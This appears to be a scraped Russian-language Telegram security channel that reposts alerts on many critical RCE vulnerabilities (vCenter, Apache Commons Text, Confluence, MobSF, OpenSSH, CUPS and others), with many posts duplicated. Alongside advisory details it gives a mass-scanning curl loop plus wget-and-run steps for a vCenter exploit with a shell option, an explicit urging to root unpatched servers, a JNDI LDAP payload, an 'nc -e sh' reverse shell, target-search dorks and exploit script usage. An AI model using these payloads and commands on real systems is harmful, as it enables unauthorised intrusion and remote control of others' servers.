Swarm of Palo Alto PAN-OS vulnerabilities
#vulnerabilities #PAN-OS #PaloAlto #RCE #DOS #XSS
https://reconshell.com/swarm-of-palo-alto-pan-os-vulnerabilities/
#vulnerabilities #PAN-OS #PaloAlto #RCE #DOS #XSS
https://reconshell.com/swarm-of-palo-alto-pan-os-vulnerabilities/
Penetration Testing Tools, ML and Linux Tutorials
Swarm of Palo Alto PAN-OS vulnerabilities - Penetration Testing Tools, ML and Linux Tutorials
Palo Alto Networks next-generation firewall (NGFW) is one of the leading enterprise firewalls used by companies around the world to protect against various
Надеюсь все обновились от #VMWare vCenter Server File Upload to #RCE #CVE-2021-22005
как проверить:
как проверить:
cat vmware_centers.txt | while read S do; do curl --connect-timeout 15 --max-time 30 --silent --insecure --user-agent "vAPI/2.100.0 Java/1.8.0_261 (Linux; 4.19.160-6.ph3; amd64)" -X POST "https://$S/analytics/telemetry/ph/api/hyper/send?_c&_i=test" -d "lorem ipsum" -H "Content-Type: application/json" -L --stderr - -v | tac | grep -q "HTTP/1.1 201" && printf "$S \033[1;35mVulnerable\e[0m\n" || printf "$S \033[1;32mPatched\e[0m\n"; done;
Если Ваши админы еще не вразумили - рутуйтесь:wget https://github.com/r0ckysec/CVE-2021-22005/raw/main/exp/cve-2021-22005_exp_linux; chmod +x
cve-2021-22005_exp_linux;
./cve-2021-22005_exp_linux -u https://IP --shell
Срочно обновлять офис…
Microsoft Word Remote Code Execution Vulnerability CVE-2022-41031 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41031) and Microsoft Office Graphics Remote Code Execution Vulnerability CVE-2022-38049 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38049)
#MSOffice #RCE #CVE
Microsoft Word Remote Code Execution Vulnerability CVE-2022-41031 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41031) and Microsoft Office Graphics Remote Code Execution Vulnerability CVE-2022-38049 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38049)
#MSOffice #RCE #CVE
#CVE-2022-42889 #Apache #RCE #4Shell
Обнаружена критическая уязвимость в программном обеспечении Apache (CVE-2022-42889) именуемая 4Shell
CVE-ID: CVE-2022-42889
CVSS Score: 9.8
Дата публикации сведений об уязвимости: 17.10.2022
Уязвимые программные продукты:
• JDK 1.8.0_341
• JDK version 9.0-16.0
Рекомендации по устранению уязвимости:
В кратчайшие сроки обновить версию уязвимой библиотеки до актуальной.
Дополнительные материалы:
https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");
Обнаружена критическая уязвимость в программном обеспечении Apache (CVE-2022-42889) именуемая 4Shell
CVE-ID: CVE-2022-42889
CVSS Score: 9.8
Дата публикации сведений об уязвимости: 17.10.2022
Уязвимые программные продукты:
• JDK 1.8.0_341
• JDK version 9.0-16.0
Рекомендации по устранению уязвимости:
В кратчайшие сроки обновить версию уязвимой библиотеки до актуальной.
Дополнительные материалы:
https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/
---
Payload:jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");
Forwarded from APT
💥 Fortinet FortiNAC Unauthenticated RCE
On Thursday, 16 February 2022, Fortinet released a PSIRT that details CVE-2022-39952, a critical vulnerability affecting its FortiNAC product. This vulnerability, discovered by Gwendal Guégniaud of Fortinet, allows an unauthenticated attacker to write arbitrary files on the system and as a result obtain remote code execution in the context of the root user.
PoC:
https://github.com/horizon3ai/CVE-2022-39952
Research:
https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/
#fortinet #fortinac #rce #cve
On Thursday, 16 February 2022, Fortinet released a PSIRT that details CVE-2022-39952, a critical vulnerability affecting its FortiNAC product. This vulnerability, discovered by Gwendal Guégniaud of Fortinet, allows an unauthenticated attacker to write arbitrary files on the system and as a result obtain remote code execution in the context of the root user.
PoC:
https://github.com/horizon3ai/CVE-2022-39952
Research:
https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/
#fortinet #fortinac #rce #cve
#CVE-2023-22527 #RCE (Remote Code Execution) Vulnerability In #Confluence Data Center and Confluence Server with #CVSS v3: 10/10
Severity:
Atlassian rates the severity level of this vulnerability as critical (10.0 with the following vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) per our internal assessment.
This is our assessment, and you should evaluate its applicability to your own IT environment.
Affected Versions:
This RCE (Remote Code Execution) vulnerability affects out-of-date Confluence Data Center and Server 8 versions released before Dec. 5, 2023 as well as 8.4.5 which no longer receives backported fixes in accordance with our Security Bug Fix Policy. Atlassian recommends patching to the latest version.
Note: 7.19.x LTS versions are not affected by this vulnerability
Product
Confluence Data Center and Server
Affected Versions
8.0.x
8.1.x
8.2.x
8.3.x
8.4.x
8.5.0-8.5.3
https://www.opencve.io/cve/CVE-2023-22527
https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html
PoC: https://github.com/cleverg0d/CVE-2023-22527/tree/main
Severity:
Atlassian rates the severity level of this vulnerability as critical (10.0 with the following vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) per our internal assessment.
This is our assessment, and you should evaluate its applicability to your own IT environment.
Affected Versions:
This RCE (Remote Code Execution) vulnerability affects out-of-date Confluence Data Center and Server 8 versions released before Dec. 5, 2023 as well as 8.4.5 which no longer receives backported fixes in accordance with our Security Bug Fix Policy. Atlassian recommends patching to the latest version.
Note: 7.19.x LTS versions are not affected by this vulnerability
Product
Confluence Data Center and Server
Affected Versions
8.0.x
8.1.x
8.2.x
8.3.x
8.4.x
8.5.0-8.5.3
https://www.opencve.io/cve/CVE-2023-22527
https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html
PoC: https://github.com/cleverg0d/CVE-2023-22527/tree/main
#CVE-2024-21633 - #MobSF Remote code execution (#RCE)
MobSF - статический анализатор приложений: Android, Apple iOS и Windows Phone и динамический анализ: только приложения Android.
Пересобрав приложение с ночинкой в
Можно получить реверс шелл с хоста на котором стоит анализатор, из-за фичи самого MobSF который позволяет записать что угодно по относительному пути
https://www.qu35t.pw/posts/2024-21633-mobsf-rce/
https://github.com/0x33c0unt/CVE-2024-21633
MobSF - статический анализатор приложений: Android, Apple iOS и Windows Phone и динамический анализ: только приложения Android.
Пересобрав приложение с ночинкой в
res/raw/jadx
к примерутакого содержания:
#!/bin/bash
nc host.docker.internal 9001 -e sh
Можно получить реверс шелл с хоста на котором стоит анализатор, из-за фичи самого MobSF который позволяет записать что угодно по относительному пути
${decode target path}/res/
https://www.qu35t.pw/posts/2024-21633-mobsf-rce/
https://github.com/0x33c0unt/CVE-2024-21633
В последнем официальном патче #Oracle от января 2024 г была исправлена #RCE уязвимость, основанная на протоколе #Weblogic T3\IIOP #CVE-2024-20931. Уязвимость была представлена в Oracle автором в октябре 2023 года и относится к обходу патча CVE-2023-21839, что влечет за собой новую поверхность атаки для #JNDI.
Описание пока скудное, но думаем скоро появятся статьи с разбором.
https://github.com/GlassyAmadeus/CVE-2024-20931
Описание пока скудное, но думаем скоро появятся статьи с разбором.
https://github.com/GlassyAmadeus/CVE-2024-20931
Forwarded from Proxy Bar
CVE-2024-32002 GIT RCE
*
Удаленное выполнение кода в подмодулях Git.
Payload может быть активирован через рекурсивное клонирование репозитория Git.
*
POC exploit
#git #rce
*
Удаленное выполнение кода в подмодулях Git.
Payload может быть активирован через рекурсивное клонирование репозитория Git.
*
POC exploit
#git #rce
cve_2024_30078_check.nasl
2.9 KB
#CVE-2024-30078 Windows #WiFi Driver #RCE
Windows Wi-Fi Driver Remote Code Execution Vulnerability
Новая уязвимость Wi-Fi подвергает риску всех пользователей Windows - исправляйте как можно скорее!
- неавторизованный RCE, затрагивающий драйверы Wi-Fi всех версий Windows, означает, что любой злоумышленник в радиусе действия Wi-Fi может скомпрометировать ваше устройство.
Published: 2024-06-11
Base Score: 8.8
Base Severity: HIGH
Vector String: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Ресурсы:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30078
https://www.forbes.com/sites/daveywinder/2024/06/14/new-wi-fi-takeover-attack-all-windows-users-warned-to-update-now/
Плагин для Nessus прилагается (функционал плагина не соотвествует уязвимости, проверяем).
Windows Wi-Fi Driver Remote Code Execution Vulnerability
Новая уязвимость Wi-Fi подвергает риску всех пользователей Windows - исправляйте как можно скорее!
- неавторизованный RCE, затрагивающий драйверы Wi-Fi всех версий Windows, означает, что любой злоумышленник в радиусе действия Wi-Fi может скомпрометировать ваше устройство.
Published: 2024-06-11
Base Score: 8.8
Base Severity: HIGH
Vector String: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Ресурсы:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-30078
https://www.forbes.com/sites/daveywinder/2024/06/14/new-wi-fi-takeover-attack-all-windows-users-warned-to-update-now/
Плагин для Nessus прилагается (функционал плагина не соотвествует уязвимости, проверяем).
Forwarded from APT
🔥 VMware vCenter Server RCE + PrivEsc
Multiple heap-overflow vulnerabilities in the implementation of the DCE/RPC protocol. They could allow a bad actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted network packet.
— CVE-2024-37079: A heap-overflow vulnerability in the DCERPC protocol implementation of vCenter Server that allows a malicious actor with network access to send specially crafted packets, potentially leading to remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37080: Another heap overflow vulnerability in the DCERPC protocol of vCenter Server. Similar to CVE-2024-37079, it allows an attacker with network access to exploit heap overflow by sending crafted packets, potentially resulting in remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37081: This vulnerability arises from a misconfiguration of sudo in vCenter Server, permitting an authenticated local user to exploit this flaw to elevate their privileges to root on the vCenter Server Appliance. (CVSS v3.1 score: 7.8 "high").
Nuclei Template (PoC):
🔗 https://gist.github.com/tothi/0ff034b254aca527c3a1283ff854592a
Shodan
FOFA
#vmware #vcenter #rce #lpe #cve
Multiple heap-overflow vulnerabilities in the implementation of the DCE/RPC protocol. They could allow a bad actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted network packet.
— CVE-2024-37079: A heap-overflow vulnerability in the DCERPC protocol implementation of vCenter Server that allows a malicious actor with network access to send specially crafted packets, potentially leading to remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37080: Another heap overflow vulnerability in the DCERPC protocol of vCenter Server. Similar to CVE-2024-37079, it allows an attacker with network access to exploit heap overflow by sending crafted packets, potentially resulting in remote code execution. (CVSS v3.1 score: 9.8 "critical");
— CVE-2024-37081: This vulnerability arises from a misconfiguration of sudo in vCenter Server, permitting an authenticated local user to exploit this flaw to elevate their privileges to root on the vCenter Server Appliance. (CVSS v3.1 score: 7.8 "high").
Nuclei Template (PoC):
🔗 https://gist.github.com/tothi/0ff034b254aca527c3a1283ff854592a
Shodan
product:"VMware vCenter Server"
FOFA
app="vmware-vCenter"
#vmware #vcenter #rce #lpe #cve
Forwarded from APT
The Qualys Threat Research Unit has discovered a Remote Unauthenticated Code Execution vulnerability in OpenSSH’s server (sshd) in glibc-based Linux systems. CVE assigned to this vulnerability is CVE-2024-6387.
The vulnerability, which is a signal handler race condition in OpenSSH’s server (sshd), allows unauthenticated remote code execution (RCE) as root on glibc-based Linux systems.
🔗 Research:
https://blog.qualys.com/vulnerabilities-threat-research/2024/07/01/regresshion-remote-unauthenticated-code-execution-vulnerability-in-openssh-server
🔗 PoC:
https://github.com/7etsuo/cve-2024-6387-poc
#openssh #glibc #rce #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from APT
This media is not supported in your browser
VIEW IN TELEGRAM
PoC for:
— CVE-2024-38094
— CVE-2024-38024
— CVE-2024-38023
🔗 Source:
https://github.com/testanull/MS-SharePoint-July-Patch-RCE-PoC
#sharepoint #poc #rce #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
#CVE-2024-22274: Privilege Escalation: #VMware #vCenter Server Authenticated #RCE
https://github.com/l0n3m4n/CVE-2024-22274-RCE
https://github.com/l0n3m4n/CVE-2024-22274-RCE
Снова Apache #OFBiz ERP #RCE #CVE-2024-38856
Коренная причина уязвимости кроется в недостатках механизма аутентификации
CVSS score of 9.8 / 10.0.
Она затрагивает Apache OFBiz все версии до 18.12.15.
https://thehackernews.com/2024/08/new-zero-day-flaw-in-apache-ofbiz-erp.html
Big thanks Aman for news
Коренная причина уязвимости кроется в недостатках механизма аутентификации
CVSS score of 9.8 / 10.0.
Она затрагивает Apache OFBiz все версии до 18.12.15.
https://thehackernews.com/2024/08/new-zero-day-flaw-in-apache-ofbiz-erp.html
Big thanks Aman for news
Forwarded from Proxy Bar
CVE-2022-24834 Redis
*
Затронуто:
7.0.0 ≤ version < 7.0.12
6.2.0 ≤ version < 6.2.13
2.6.0 ≤ version < 6.0.20
*
Большой разбор + PoC exploit RCE
*
VideoPOC
#redis #rce
*
Затронуто:
7.0.0 ≤ version < 7.0.12
6.2.0 ≤ version < 6.2.13
2.6.0 ≤ version < 6.0.20
*
Большой разбор + PoC exploit RCE
*
VideoPOC
#redis #rce
Forwarded from APT
Nagios XI 2024R1.01 has a vulnerability in the
monitoringwizard.php
component, allowing authenticated SQL injection (CVE-2024-24401) that lets attackers create an admin account and remote code execution. 🔗 Source:
https://github.com/MAWK0235/CVE-2024-24401
#nagios #sql #rce #privesc #poc #exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Похек (Сергей Зыбнев)
This media is not supported in your browser
VIEW IN TELEGRAM
#unix #RCE #CVE
CVE-2024-47176 CVE-2024-47076 CVE-2024-47175 CVE-2024-47177
Вчера вечером интернет наводнился новостью о новой баге в UNIX системах, которая позволяет выполнить неавторизованный RCE. Но были особые условия, к примеру что должна быть очередь на печать. В прикрепленном видосе демонстрируется PoC.
Авторы эксплойта изучили коммит в OpenPrinting CUPS, в котором была исправлена бага и написали эксплойт. Он использует dns-sd обнаружение принтера, требуя, чтобы цель могла получить широковещательное сообщение, т.е. находилась в той же сети.
usage: cupshax.py [-h] [--name NAME] --ip IP [--command COMMAND] [--port PORT]
A script for executing commands remotely
options:
-h, --help show this help message and exit
--name NAME The name to use (default: RCE Printer)
--ip IP The IP address of the machine running this script
--command COMMAND The command to execute (default: 'touch /tmp/pwn')
--port PORT The port to connect on (default: 8631)
python cupshax.py --name "Print to PDF (Color)" \
--command "id>/tmp/pwn" \
--ip 10.0.0.3
Please open Telegram to view this post
VIEW IN TELEGRAM